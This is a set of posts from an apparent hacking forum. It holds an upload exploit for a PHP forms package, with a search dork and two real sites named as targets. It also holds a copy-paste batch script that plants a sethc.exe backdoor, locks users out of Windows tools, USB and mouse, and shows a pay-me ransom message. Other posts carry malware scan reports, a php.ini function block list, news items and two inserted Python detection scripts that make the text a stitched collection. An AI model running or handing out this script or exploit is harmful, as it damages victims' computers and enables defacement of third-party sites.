Skream Example

Posts posted by Skream Example

  1. # Author: [PretoriaN]
    # Vendor or Software Link:
    # Version: [app version]
    # Category: [Exploit]
    # Google dork: [inurl:/forms/FORMfields/]
    # Tested on: [PHP]
    #Exploit:/examples/allFields/ffce_all_fields.php#upload

    Step 1: in Text Field: type any name
    Step 2: Image Verification: Write image verification
    Step 3: in Upload Field choose your index and type Save

    And you will see a link where The Index has been Located
    # Demo site: [hxxp://www.libyaonline.com/forms/FORMfields/examples/allFields/ffce_all_fields.php#upload]
    Demo 2: [hxxp://www.corindagolfcourse.com.au/forms/FORMfields/examples/allFields/ffce_all_fields.php#upload]

  2. File Info

    Report date: 2011-03-24 12:52:56 (GMT 1)

    File name: giga-crypter-exe

    File size: 5402624 bytes

    MD5 Hash: 2215ab0aba9ee87281934924943fa4be

    SHA1 Hash: ad2d05e470d062fc57359df4534abf307aa383ab

    Detection rate: 4 on 9 (44%)

    Status: INFECTED

    Detections

    Avast - MSIL:Inject-AE [Trj]

    AVG - Dropper.Msil.AB

    ClamAV -

    Comodo -

    Emsisoft - Gen.Variant.MSILKrypt!IK

    F-Prot -

    Ikarus - Gen.Variant.MSILKrypt

    TrendMicro -

    Zoner -

    Scan report generated by

    NoVirusThanks.org

    // Removed

  3. Below is the batch script which edits the registry forcefully and makes some unwanted changes in Windows, which finally makes the person mad and format the system. Copy and paste the below code to Notepad and save as .bat

    @ECHO OFF
    REM adding the system prompt at the login time
    cd\
    cd windows\system32
    copy cmd.exe d:
    d:
    ren cmd.exe sethc.exe
    echo y|copy sethc.exe c:\windows\system32\
    del sethc.exe

    REM removing folder options from user panel
    REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

    REM removing folder options from machine
    REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

    REM disabling task manager
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

    REM disabling the run bar
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

    REM disabling the noclose option
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

    REM disabling the NoFind(search) option
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

    REM disabling the all drives from user seeing
    REG add HKCU\software\microsoft\windows\currentversion\policies\explorer /v NoDrives /t REG_DWORD /d 0x3ffffff /f

    REM disabling the desktop
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f

    REM adding the legal caption at the start up
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "YOUR COMPUTER IS HACKED BY Crazy009" /f

    REM adding the text in the legal caption value at start up
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "HEY DUDE,HOW ARE YOU ???? HOPEFULLY YOU ARE NOT FINE AS YOUR COMPUTER IS HACKED BY ME.ACTUALLY YOU MUST GIVE RESPECT TO THE HACKERS,THESE GUYS ARE BRILLIANT AND BLAH,BLAH......OH DONT CRY FOR YOUR SYSTEM.I CAN REPAIR IT,FOR THAT PAY ME,CONTACT: indishell.crazy009@gmail.com" /f

    REM Hacking the Internet Explorer
    REM Making the toolbar kewl
    REG add "HKCU\Software\Microsoft\Internet Explorer\Toolbar" /v BackBitmap /t REG_SZ /d c:\Windows\Web\Wallpaper\Bliss.bmp /f

    REM Changing the Caption of IE
    REG add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "HACKED BY ANKIT CHAUHAN" /f

    REM removing the user name from start menu
    REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

    REM removing all-programs option from start menu
    REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

    REM locking the taskbar
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v LockTaskbar /t REG_DWORD /d 1 /f

    REM blocking usb ports
    REG add HKLM\System\CurrentControlSet\Services\USBSTOR /v Start /t REG_DWORD /d 4 /f

    REM disabling system restore point
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

    REM disabling the windows key
    REG add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 00000000000000000300000000005be000005ce000000000 /f

    REM changing the wallpaper
    REG add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Windows\Web\Wallpaper\Azul.jpeg /f

    REM disabling the editing of registry
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

    REM editing the boot file with no guiboot
    bootcfg /addsw /ng /id 1

    REM Swapping of Mouse Button Functions
    rundll32 user32.dll,SwapMouseButton

    REM TO DISABLE THE MOUSE
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4

    Don't run on your own system
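
A detection rule for the registry writes in the script above, added here as an example and not part of the original post: it flags a shell whose child processes set several lockout values in a short time. The event dictionaries, their field names, the SID and the `SAMPLE` data are constructed for illustration and do not follow any real log format.

```python
import re

# Value names the script sets to 1 under ...\Policies\Explorer or ...\Policies\System.
LOCKOUT = {"disabletaskmgr", "disableregistrytools", "nofolderoptions",
           "norun", "noclose", "nofind", "nodesktop"}
POLICY = re.compile(r"\\currentversion\\policies\\(explorer|system)\\[^\\]+$")
# Service Start values the script sets to 4 (disabled).
SERVICE = re.compile(r"\\services\\(usbstor|mouclass)\\start$")

def classify(ev):
    """Map one registry-set event to a finding string, or None."""
    target = ev["target"].lower()
    name = target.rsplit("\\", 1)[-1]
    if POLICY.search(target) and name in LOCKOUT and ev["data"] == 1:
        return "policy lockout: " + name
    m = SERVICE.search(target)
    if m and ev["data"] == 4:
        return "driver disabled: " + m.group(1)
    return None

def correlate(events, window=60, threshold=3):
    """Return {shell_pid: findings} for shells with >= threshold distinct findings in window seconds."""
    by_shell = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        finding = classify(ev)
        if finding:
            # Each REG add line runs in its own reg.exe, so group on the parent shell.
            shell = ev["ppid"] if ev["image"].lower().endswith("reg.exe") else ev["pid"]
            by_shell.setdefault(shell, []).append((ev["ts"], finding))
    alerts = {}
    for shell, hits in by_shell.items():
        for start, _ in hits:
            seen = {f for ts, f in hits if 0 <= ts - start <= window}
            if len(seen) >= threshold:
                alerts[shell] = sorted(seen)
                break
    return alerts

def make_event(ts, pid, ppid, target, data, image="C:\\Windows\\System32\\reg.exe"):
    return {"ts": ts, "pid": pid, "ppid": ppid, "target": target, "data": data, "image": image}

HKU = "HKU\\S-1-5-21-0\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\"
SAMPLE = [  # constructed events; ts is seconds since the first event
    make_event(0, 501, 500, HKU + "System\\DisableTaskMgr", 1),
    make_event(1, 502, 500, HKU + "Explorer\\NoRun", 1),
    make_event(2, 503, 500, "HKLM\\System\\CurrentControlSet\\Services\\USBSTOR\\Start", 4),
    make_event(9, 700, 650, HKU + "Explorer\\NoRun", 1),  # single change from another shell
]
```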

  4. First of all, what is TrafficLight?

    It is a real-time antivirus and anti-phishing scanner that indicates the safety level of web pages.

    This product, released by Bitdefender, aims to provide safety when browsing online.

    TrafficLight is not a toolbar and does not rely on users flagging the pages they visit.

    TrafficLight is a search-engine-independent application that filters web traffic and "communicates" through traffic-light symbols inserted into the visited pages to signal the safety level of particular URLs.

    TrafficLight does not obstruct visibility on sites: the program's interface can be displayed with a single click; when not in use, it stays hidden.

    TrafficLight also uses the BitDefender scanning engines to analyze and evaluate every page and link accessed, and blocks unsafe content before it reaches the browser used by the user, whichever one that is.

    In addition, BitDefender has released a version of TrafficLight as a Google Chrome browser extension, for those who use Linux or Mac OS X. The extension is available on the Google Chrome extensions site.

    It can be downloaded from here

  5. File Info

    Report date: 2011-03-22 11:59:33 (GMT 1)

    File name: jasakom-exe

    File size: 1607680 bytes

    MD5 Hash: 16a890cff591522f4c57b70eecca7e0b

    SHA1 Hash: 0ff3dda6f7d8e54489ad065770238b259c896964

    Detection rate: 7 on 9 (78%)

    Status: INFECTED

    Detections

    Avast - Win32: Delf-LWX [Drp]

    AVG - Dropper.Generic.CHDX

    ClamAV -

    Comodo - UnclassifiedMalware

    Emsisoft - Trojan.Win32.Buzus!IK

    F-Prot - W32/Trojan2.HTQT

    Ikarus - Trojan.Win32.Buzus

    TrendMicro -

    Zoner - Trojan.Buzus-4904

    Scan report generated by

    NoVirusThanks.org

    Download:

    // Link removed, it is too detectable and may also be infected

  6. The adult Web industry is official!

    After 10 years of controversy and debate, the Internet Corporation for Assigned Names and Numbers (ICANN) has decided to approve .XXX as a top-level domain.

    However, the idea of creating a "red-light" district for sites with pornographic content has drawn criticism from religious groups and conservatives, who argue that the .XXX domain would legitimize pornographic content on the internet, which would become easier to find, including by minors.

    On the other hand, the Free Speech Coalition, which represents the adult industry, maintains that XXX sites will thus be easier to block, reducing audience and revenue.

    But, philosophies aside, it all comes down to money. The US agency that handles the allocation of the new domains will enjoy a rather generous profit, given that companies wanting to register their web address under .XXX will have to pay 60 dollars a year.

    And since, according to estimates, their number will reach approximately 500,000 by summer, when the first sites on the new domain will appear, we can conclude that the arrangement is an extremely advantageous one.

    Note that the fee for domains is normally around 10 dollars or even less.

    source: hit.ro

  7. Adding these things to your php.ini file protects your server from execution of shells.

    disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abort, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpassthru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo, escapeshellarg, escapeshellcmd, ini_alter, popen, pcntl_exec, socket_accept, socket_bind, socket_clear_error, socket_close, socket_connect
    safe_mode = On
    register_globals = Off
    display_errors = Off
    allow_url_fopen = Off
    allow_url_include = Off
    enable open_basedir (set it to the webroot path)
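
A php.ini audit for the settings listed above, added here as an example and not part of the original post. It reports command-execution functions missing from `disable_functions`, entries that are not valid function names (a mangled name such as `proc?_open` disables nothing), and list lines that fall outside the directive because an unquoted value ends at the line break. The `REQUIRED` subset, the function names and the `SAMPLE` file are assumptions made for this example.

```python
import re

# Command-execution functions to require (a subset of the post's list).
REQUIRED = {"exec", "system", "passthru", "shell_exec",
            "popen", "proc_open", "pcntl_exec"}
MUST_BE_OFF = ("display_errors", "allow_url_fopen", "allow_url_include")
OFF = {"off", "0", "false", "no"}

def parse_ini(text):
    """Return (directives, orphans): key/value pairs and lines with no '='."""
    directives, orphans = {}, []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop comments (quoted ';' not handled)
        if not line or line.startswith("["):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            directives[key.strip().lower()] = value.strip().strip('"')
        else:
            orphans.append(line)              # e.g. the tail of a wrapped list
    return directives, orphans

def audit(text):
    """Return a list of findings for one php.ini file's contents."""
    directives, orphans = parse_ini(text)
    listed = directives.get("disable_functions", "").split(",")
    names = [n.strip() for n in listed if n.strip()]
    valid = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
    findings = [f"not disabled: {f}" for f in sorted(REQUIRED - set(names))]
    findings += [f"not a function name: {n!r}" for n in names if not valid.fullmatch(n)]
    findings += [f"stray line: {o}" for o in orphans]
    for key in MUST_BE_OFF:
        got = directives.get(key, "<unset>").lower()
        if got not in OFF:
            findings.append(f"{key} = {got}")
    if not directives.get("open_basedir"):
        findings.append("open_basedir not set")
    return findings

# Constructed sample reproducing the wrapped list and mangled name seen above.
SAMPLE = """\
disable_functions = exec, system, passthru, shell_exec, proc?_open,
popen, pcntl_exec
display_errors = Off
allow_url_fopen = Off
allow_url_include = On
"""
```

`safe_mode` and `register_globals` were removed in PHP 5.4, so the audit does not check them.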
